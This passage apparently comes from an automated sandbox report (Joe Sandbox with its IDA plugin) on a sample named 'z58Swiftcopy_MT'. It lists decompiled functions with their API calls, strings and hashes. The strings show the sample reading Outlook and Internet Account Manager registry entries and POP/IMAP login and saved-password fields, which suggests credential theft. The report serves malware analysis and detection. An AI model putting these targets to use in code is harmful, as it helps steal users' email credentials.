                                                                                                                                                                                                                                        • Part of subcall function 00410B62: RegEnumKeyExA.ADVAPI32(00000000,?,?,000000FF,00000000,00000000,00000000,?,?,00000000), ref: 00410B85
                                                                                                                                                                                                                                      • RegCloseKey.ADVAPI32(?), ref: 00402D9F
                                                                                                                                                                                                                                        • Part of subcall function 00410B1E: RegCloseKey.ADVAPI32(000003FF,?,?,?,?,00000000,000003FF), ref: 00410B57
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 00402CF7
                                                                                                                                                                                                                                      • sprintf.MSVCRT ref: 00402D10
                                                                                                                                                                                                                                      • sprintf.MSVCRT ref: 00402D4E
                                                                                                                                                                                                                                        • Part of subcall function 00402BD1: memset.MSVCRT ref: 00402BF1
                                                                                                                                                                                                                                        • Part of subcall function 00402BD1: RegCloseKey.ADVAPI32 ref: 00402C55
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.28454828693.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.28454828693.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.28454828693.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Closememset$sprintf$EnumOpen
                                                                                                                                                                                                                                      • String ID: %s\%s$Identities$Software\Microsoft\Internet Account Manager\Accounts$Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts$Username
                                                                                                                                                                                                                                      • API String ID: 1831126014-3814494228
                                                                                                                                                                                                                                      • Opcode ID: e8f6eaf9c13d0249a01ea98d471cb1a8874e737a8319c7d0390265d86dcdbfa3
                                                                                                                                                                                                                                      • Instruction ID: 079f63aacd2b880b2e0576cff081af09170d207e8fe08998d1b5f7116231a607
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: e8f6eaf9c13d0249a01ea98d471cb1a8874e737a8319c7d0390265d86dcdbfa3
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: C7313072D0011DBADB11DA91CD46FEFB77CAF14345F0404A6BA18B2191E7B8AF849B64
                                                                                                                                                                                                                                      Function 004100CC Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 81stringCOMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • strchr.MSVCRT ref: 004100E4
                                                                                                                                                                                                                                      • _mbscpy.MSVCRT(?,-00000001), ref: 004100F2
                                                                                                                                                                                                                                        • Part of subcall function 0040783C: strlen.MSVCRT ref: 0040784E
                                                                                                                                                                                                                                        • Part of subcall function 0040783C: strlen.MSVCRT ref: 00407856
                                                                                                                                                                                                                                        • Part of subcall function 0040783C: _memicmp.MSVCRT ref: 00407874
                                                                                                                                                                                                                                      • _mbscpy.MSVCRT(?,00000000,00000000,?,00000000,00000104,00000104), ref: 00410142
                                                                                                                                                                                                                                      • _mbscat.MSVCRT ref: 0041014D
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 00410129
                                                                                                                                                                                                                                        • Part of subcall function 0040715B: GetWindowsDirectoryA.KERNEL32(0045AA00,00000104,?,00410182,00000000,?,00000000,00000104,00000104), ref: 00407170
                                                                                                                                                                                                                                        • Part of subcall function 0040715B: _mbscpy.MSVCRT(00000000,0045AA00,?,00410182,00000000,?,00000000,00000104,00000104), ref: 00407180
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 00410171
                                                                                                                                                                                                                                      • memcpy.MSVCRT(?,00000000,00000002,00000000,?,00000000,00000104,00000104), ref: 0041018C
                                                                                                                                                                                                                                      • _mbscat.MSVCRT ref: 00410197
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.28454828693.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.28454828693.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.28454828693.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: _mbscpy$_mbscatmemsetstrlen$DirectoryWindows_memicmpmemcpystrchr
                                                                                                                                                                                                                                      • String ID: \systemroot
                                                                                                                                                                                                                                      • API String ID: 912701516-1821301763
                                                                                                                                                                                                                                      • Opcode ID: 6597b15a16a773eef37e6b590fdc8d99fee9a87505121146da4ae3bca3d5ad9a
                                                                                                                                                                                                                                      • Instruction ID: fda7f57b1b0f7358cef9bf297f3eeb801234e423e358f1bd4862c9dba8460d26
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 6597b15a16a773eef37e6b590fdc8d99fee9a87505121146da4ae3bca3d5ad9a
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 3721AA7590C28479F724E2618C83FEA679CDB55704F50405FB2C9A51C1EAECF9C5862A
                                                                                                                                                                                                                                      Function 004108E5 Relevance: 15.8, APIs: 5, Strings: 4, Instructions: 64COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • UuidFromStringA.RPCRT4(220D5CD0-853A-11D0-84BC-00C04FD43F8F,00000001), ref: 00410902
                                                                                                                                                                                                                                      • UuidFromStringA.RPCRT4(220D5CC1-853A-11D0-84BC-00C04FD43F8F,00000001), ref: 00410916
                                                                                                                                                                                                                                      • UuidFromStringA.RPCRT4(417E2D75-84BD-11D0-84BB-00C04FD43F8F,?), ref: 00410923
                                                                                                                                                                                                                                      • memcpy.MSVCRT(?,00000000,?,00000001,?,?,?,00000000), ref: 00410961
                                                                                                                                                                                                                                      • CoTaskMemFree.COMBASE(00000000), ref: 00410970
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      • 220D5CD0-853A-11D0-84BC-00C04FD43F8F, xrefs: 004108FD
                                                                                                                                                                                                                                      • 417E2D75-84BD-11D0-84BB-00C04FD43F8F, xrefs: 0041091E
                                                                                                                                                                                                                                      • 220D5CD1-853A-11D0-84BC-00C04FD43F8F, xrefs: 0041090A
                                                                                                                                                                                                                                      • 220D5CC1-853A-11D0-84BC-00C04FD43F8F, xrefs: 00410911
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.28454828693.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.28454828693.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.28454828693.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: FromStringUuid$FreeTaskmemcpy
                                                                                                                                                                                                                                      • String ID: 220D5CC1-853A-11D0-84BC-00C04FD43F8F$220D5CD0-853A-11D0-84BC-00C04FD43F8F$220D5CD1-853A-11D0-84BC-00C04FD43F8F$417E2D75-84BD-11D0-84BB-00C04FD43F8F
                                                                                                                                                                                                                                      • API String ID: 1640410171-2022683286
                                                                                                                                                                                                                                      • Opcode ID: abdaa11197fe0e36068712593a832dde72f9d49fceae32f26c9e946e83c56665
                                                                                                                                                                                                                                      • Instruction ID: 9e6d0ab6f4d779539f8eb1da53a4fb6c135c1230b89e6f6df403d509513a9b08
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: abdaa11197fe0e36068712593a832dde72f9d49fceae32f26c9e946e83c56665
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: AD1151B391011DAAEF11EEA5DC80EEB37ACAB45350F040027F951E3251E6B4D9458BA5
                                                                                                                                                                                                                                      Function 004196A1 Relevance: 15.3, APIs: 6, Strings: 4, Instructions: 321COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                        • Part of subcall function 00412F93: strlen.MSVCRT ref: 00412FA1
                                                                                                                                                                                                                                      • memcpy.MSVCRT(00000000,00000000,00000000,00000000,00000000,004067AF,?,0041D945,00000000), ref: 0041983C
                                                                                                                                                                                                                                      • memcpy.MSVCRT(?,00000000,00000000,00000000,00000000,004067AF,?,0041D945,00000000), ref: 0041985B
                                                                                                                                                                                                                                      • memcpy.MSVCRT(?,00000000,00000000,00000000,00000000,004067AF,?,0041D945,00000000), ref: 0041986D
                                                                                                                                                                                                                                      • memcpy.MSVCRT(?,-journal,0000000A,?,?,?,00000000,00000000,004067AF,?,0041D945,00000000), ref: 00419885
                                                                                                                                                                                                                                      • memcpy.MSVCRT(?,00000000,00000000,?,?,?,?,?,?,00000000,00000000,004067AF,?,0041D945,00000000), ref: 004198A2
                                                                                                                                                                                                                                      • memcpy.MSVCRT(?,-wal,00000005,?,?,?,?,?,?,?,?,?,00000000,00000000,004067AF), ref: 004198BA
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.28454828693.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.28454828693.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.28454828693.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: memcpy$strlen
                                                                                                                                                                                                                                      • String ID: -journal$-wal$immutable$nolock
                                                                                                                                                                                                                                      • API String ID: 2619041689-3408036318
                                                                                                                                                                                                                                      • Opcode ID: 4aa253e10d8a34062e03d838a13a14f4a10eae4ea059de94ba2ca72b62420cd1
                                                                                                                                                                                                                                      • Instruction ID: 25f2131b2e7268d2841c48c11c9a86e68458d3caa4be6fdea11427aceae17f40
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 4aa253e10d8a34062e03d838a13a14f4a10eae4ea059de94ba2ca72b62420cd1
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 9FC1D1B1A04606EFDB14DFA5C841BDEFBB0BF45314F14815EE528A7381D778AA90CB98
                                                                                                                                                                                                                                      Function 00409C1C Relevance: 15.2, APIs: 7, Strings: 3, Instructions: 157COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                        • Part of subcall function 00409A32: ??3@YAXPAX@Z.MSVCRT(?,?,00000000,00409C2C,?,?,00000000,762D0A60,?,00000000), ref: 00409A3E
                                                                                                                                                                                                                                        • Part of subcall function 00409A32: ??3@YAXPAX@Z.MSVCRT(?,?,00000000,00409C2C,?,?,00000000,762D0A60,?,00000000), ref: 00409A4C
                                                                                                                                                                                                                                        • Part of subcall function 00409A32: ??3@YAXPAX@Z.MSVCRT(?,?,00000000,00409C2C,?,?,00000000,762D0A60,?,00000000), ref: 00409A5D
                                                                                                                                                                                                                                        • Part of subcall function 00409A32: ??3@YAXPAX@Z.MSVCRT(?,?,00000000,00409C2C,?,?,00000000,762D0A60,?,00000000), ref: 00409A74
                                                                                                                                                                                                                                        • Part of subcall function 00409A32: ??3@YAXPAX@Z.MSVCRT(?,?,00000000,00409C2C,?,?,00000000,762D0A60,?,00000000), ref: 00409A7D
                                                                                                                                                                                                                                      • ??2@YAPAXI@Z.MSVCRT(00000000,?,?,00000000,762D0A60,?,00000000), ref: 00409C53
                                                                                                                                                                                                                                      • ??2@YAPAXI@Z.MSVCRT(00000000,00000000,?,?,00000000,762D0A60,?,00000000), ref: 00409C6F
                                                                                                                                                                                                                                      • memcpy.MSVCRT(?,0wE,00000014,?,?,00000000,762D0A60), ref: 00409C97
                                                                                                                                                                                                                                      • memcpy.MSVCRT(?,0wE,00000010,?,0wE,00000014,?,?,00000000,762D0A60), ref: 00409CB4
                                                                                                                                                                                                                                      • ??2@YAPAXI@Z.MSVCRT(00000000,?,?,?,?,?,00000000,762D0A60), ref: 00409D3D
                                                                                                                                                                                                                                      • ??2@YAPAXI@Z.MSVCRT(0000000C,00000000,?,?,?,?,?,00000000,762D0A60), ref: 00409D47
                                                                                                                                                                                                                                      • ??2@YAPAXI@Z.MSVCRT(00000000,?,?,?,?,?,00000000,762D0A60), ref: 00409D7F
                                                                                                                                                                                                                                        • Part of subcall function 00408DB6: LoadStringA.USER32(00000000,0000000D,?,?), ref: 00408E7F
                                                                                                                                                                                                                                        • Part of subcall function 00408DB6: memcpy.MSVCRT(00000000,00000001,?,?,?,?,?,00000000,762D0A60), ref: 00408EBE
                                                                                                                                                                                                                                        • Part of subcall function 00408DB6: _mbscpy.MSVCRT(0045A550,strings,?,?,00409CE2,?,?,?,?,?,00000000,762D0A60), ref: 00408E31
                                                                                                                                                                                                                                        • Part of subcall function 00408DB6: strlen.MSVCRT ref: 00408E4F
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.28454828693.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.28454828693.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.28454828693.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: ??2@??3@$memcpy$LoadString_mbscpystrlen
                                                                                                                                                                                                                                      • String ID: 0wE$`-v$`-v
                                                                                                                                                                                                                                      • API String ID: 2915808112-2625145802
                                                                                                                                                                                                                                      • Opcode ID: ed916fde650882a961c0d1d8ab7e73890c0a1d0683c4cd4983fb3a7ffada175a
                                                                                                                                                                                                                                      • Instruction ID: 1be057752684aea17f507b8882d339e9c418a93e0b7bc1648df0d3b0eb18cc96
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: ed916fde650882a961c0d1d8ab7e73890c0a1d0683c4cd4983fb3a7ffada175a
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: B4513B71A01704AFEB24DF29D542B9AB7E4FF88314F10852EE55ADB382DB74E940CB44
                                                                                                                                                                                                                                      Function 004019EA Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 195stringCOMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.28454828693.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.28454828693.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.28454828693.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: free$strlen
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 667451143-3916222277
                                                                                                                                                                                                                                      • Opcode ID: 9b31ecf1158dd6ae2a3c8c1c56445d205644741fb05b7f80747d8069a3e6348b
                                                                                                                                                                                                                                      • Instruction ID: 13b3c487e6fc4f201ff2a1b2153655c725249ac645d8b76b05149576827ff0bb
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 9b31ecf1158dd6ae2a3c8c1c56445d205644741fb05b7f80747d8069a3e6348b
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 1F6189319093869FDB109F25948452BBBF0FB8531AF905D7FF4D2A22A2D738D845CB0A
                                                                                                                                                                                                                                      Function 00404A99 Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 52libraryloaderwindowCOMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • LoadLibraryA.KERNEL32(comctl32.dll,762D0A60,?,00000000,?,?,?,0040CF60,762D0A60), ref: 00404AB8
                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 00404ACA
                                                                                                                                                                                                                                      • FreeLibrary.KERNEL32(00000000,?,00000000,?,?,?,0040CF60,762D0A60), ref: 00404ADE
                                                                                                                                                                                                                                      • MessageBoxA.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 00404B09
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.28454828693.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.28454828693.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.28454828693.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Library$AddressFreeLoadMessageProc
                                                                                                                                                                                                                                      • String ID: Error$Error: Cannot load the common control classes.$InitCommonControlsEx$comctl32.dll
                                                                                                                                                                                                                                      • API String ID: 2780580303-317687271
                                                                                                                                                                                                                                      • Opcode ID: 7992fcdcafd7ff6fedb2cae98ddd2050c088282ff9ffca5c48e78306170b2e8e
                                                                                                                                                                                                                                      • Instruction ID: 488ab604db7d7bb3946a6a0ddadc23e58717ff74c8dc9d9f2a6c2f93e1cc5ebb
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 7992fcdcafd7ff6fedb2cae98ddd2050c088282ff9ffca5c48e78306170b2e8e
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: F401D679B512106BE7115BE59C89F6BBAACDB86759B040135BA02F1180DAB899018A5C
                                                                                                                                                                                                                                      Function 00406C7C Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 52librarystringwindowCOMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • LoadLibraryExA.KERNEL32(netmsg.dll,00000000,00000002,?,00000000,?,?,00406D9B,?,?), ref: 00406CA1
                                                                                                                                                                                                                                      • FormatMessageA.KERNEL32(00001100,00000000,00000000,00000400,?,00000000,00000000,?,00000000,?,?,00406D9B,?,?), ref: 00406CBF
                                                                                                                                                                                                                                      • strlen.MSVCRT ref: 00406CCC
                                                                                                                                                                                                                                      • _mbscpy.MSVCRT(?,?,?,?,00406D9B,?,?), ref: 00406CDC
                                                                                                                                                                                                                                      • LocalFree.KERNEL32(?,?,?,00406D9B,?,?), ref: 00406CE6
                                                                                                                                                                                                                                      • _mbscpy.MSVCRT(?,Unknown Error,?,?,00406D9B,?,?), ref: 00406CF6
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.28454828693.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.28454828693.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.28454828693.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: _mbscpy$FormatFreeLibraryLoadLocalMessagestrlen
                                                                                                                                                                                                                                      • String ID: Unknown Error$netmsg.dll
                                                                                                                                                                                                                                      • API String ID: 2881943006-572158859
                                                                                                                                                                                                                                      • Opcode ID: b7e81aadefcc7b6962b65187ced15e7eab001dc011c9c914f76b8834be414875
                                                                                                                                                                                                                                      • Instruction ID: bcf62a4d61e6eba693f00c41f459c7331aa1a44f371262b110411e5fdf5e0d86
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: b7e81aadefcc7b6962b65187ced15e7eab001dc011c9c914f76b8834be414875
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: B201DF31609114BBF7051B61EE46F9FBA6CEF49790F20002AF607B1191DA78AE10969C
                                                                                                                                                                                                                                      Function 0040966C Relevance: 14.0, APIs: 3, Strings: 5, Instructions: 42COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                        • Part of subcall function 00406F81: GetFileAttributesA.KERNELBASE(?,00409675,?,0040972B,00000000,?,00000000,00000104,?), ref: 00406F85
                                                                                                                                                                                                                                      • _mbscpy.MSVCRT(0045A448,00000000,00000000,00000000,0040972B,00000000,?,00000000,00000104,?), ref: 00409686
                                                                                                                                                                                                                                      • _mbscpy.MSVCRT(0045A550,general,0045A448,00000000,00000000,00000000,0040972B,00000000,?,00000000,00000104,?), ref: 00409696
                                                                                                                                                                                                                                      • GetPrivateProfileIntA.KERNEL32(0045A550,rtl,00000000,0045A448), ref: 004096A7
                                                                                                                                                                                                                                        • Part of subcall function 00409278: GetPrivateProfileStringA.KERNEL32(0045A550,?,0044C52F,0045A5A0,?,0045A448), ref: 00409293
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.28454828693.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.28454828693.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.28454828693.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: PrivateProfile_mbscpy$AttributesFileString
                                                                                                                                                                                                                                      • String ID: TranslatorName$TranslatorURL$charset$general$rtl
                                                                                                                                                                                                                                      • API String ID: 888011440-2039793938
                                                                                                                                                                                                                                      • Opcode ID: bcaacaf8b0ae019c7a44cf7c189e97e1f6c6f5de2524552f312430b312ca54f0
                                                                                                                                                                                                                                      • Instruction ID: 35163425d10a67bbe8c9c36fe52ba00322d2719519e04c12929343b9a05e3383
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: bcaacaf8b0ae019c7a44cf7c189e97e1f6c6f5de2524552f312430b312ca54f0
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 51F09621EC021636EA113A315C47F6E75148F91B16F1546BBBD057B2C3EA6C8D21819F
                                                                                                                                                                                                                                      Function 0042E8E8 Relevance: 13.8, APIs: 2, Strings: 7, Instructions: 272COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      • database is already attached, xrefs: 0042EA97
                                                                                                                                                                                                                                      • unable to open database: %s, xrefs: 0042EBD6
                                                                                                                                                                                                                                      • attached databases must use the same text encoding as main database, xrefs: 0042EAE6
                                                                                                                                                                                                                                      • cannot ATTACH database within transaction, xrefs: 0042E966
                                                                                                                                                                                                                                      • too many attached databases - max %d, xrefs: 0042E951
                                                                                                                                                                                                                                      • out of memory, xrefs: 0042EBEF
                                                                                                                                                                                                                                      • database %s is already in use, xrefs: 0042E9CE
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.28454828693.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.28454828693.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.28454828693.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: memcpymemset
                                                                                                                                                                                                                                      • String ID: attached databases must use the same text encoding as main database$cannot ATTACH database within transaction$database %s is already in use$database is already attached$out of memory$too many attached databases - max %d$unable to open database: %s
                                                                                                                                                                                                                                      • API String ID: 1297977491-2001300268
                                                                                                                                                                                                                                      • Opcode ID: 79cb3876c2fc92d661153f2d5ae8e07f357d02a67bcab47e18a9ae982f962df5
                                                                                                                                                                                                                                      • Instruction ID: 706ac67067754653a22c48b2dfc2d31ecc94a00d4abf430cd75191e688397775
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 79cb3876c2fc92d661153f2d5ae8e07f357d02a67bcab47e18a9ae982f962df5
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: E5A1BFB16083119FD720DF26E441B1BBBE0BF84314F54491FF8998B252D778E989CB5A
                                                                                                                                                                                                                                      Function 00403166 Relevance: 13.6, APIs: 1, Strings: 8, Instructions: 100stringCOMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                        • Part of subcall function 00403138: GetPrivateProfileStringA.KERNEL32(00000000,?,0044C52F,?,?,?), ref: 0040315C
                                                                                                                                                                                                                                      • strchr.MSVCRT ref: 0040327B
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.28454828693.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.28454828693.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.28454828693.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: PrivateProfileStringstrchr
                                                                                                                                                                                                                                      • String ID: 1$LoginName$PopAccount$PopServer$RealName$ReturnAddress$SavePasswordText$UsesIMAP
                                                                                                                                                                                                                                      • API String ID: 1348940319-1729847305
                                                                                                                                                                                                                                      • Opcode ID: b5df54f4728cfba1fc6d3682f37c83209c501ebf9394a37894307d593f194734
                                                                                                                                                                                                                                      • Instruction ID: 3c3f6fb7771655520bf9db4259302bbcc59fb1a7701990a2e81aa7d88bec6f27
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: b5df54f4728cfba1fc6d3682f37c83209c501ebf9394a37894307d593f194734
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 6C31A07094024EBEEF119F60CC45FDABF6CAF14319F10806AB59C7A1D1C7B99B948B54
                                                                                                                                                                                                                                      Function 00411004 Relevance: 13.6, APIs: 3, Strings: 6, Instructions: 60COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • memcpy.MSVCRT(?,&quot;,00000006,?,?,00000000,0040ABBD,?,?), ref: 00411034
                                                                                                                                                                                                                                      • memcpy.MSVCRT(?,&amp;,00000005,?,?,00000000,0040ABBD,?,?), ref: 0041105A
                                                                                                                                                                                                                                      • memcpy.MSVCRT(?,&lt;,00000004,?,?,00000000,0040ABBD,?,?), ref: 00411072
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.28454828693.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.28454828693.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.28454828693.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
